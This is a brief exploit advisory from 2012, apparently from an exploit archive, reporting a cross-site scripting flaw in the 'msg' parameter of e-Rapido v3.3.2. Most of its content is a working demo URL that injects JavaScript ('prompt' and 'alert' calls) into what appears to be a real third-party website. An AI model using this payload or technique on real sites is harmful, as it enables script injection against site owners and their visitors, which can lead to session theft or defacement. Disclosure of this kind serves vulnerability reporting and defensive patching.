# Exploit Title: e-Rapido v3.3.2 Cross Site Scripting # Date: 13.03.2012 # Author: l20ot # Web Browser : Mozilla Firefox # Blog : http://www.twitter.com/l20ot ------------------------------------------------------ msg Parameter is vulerable to XSS! Demo: http://www.armazemdosfiltros.com.br/erapido/index.php?msg=");prompt(2);alert("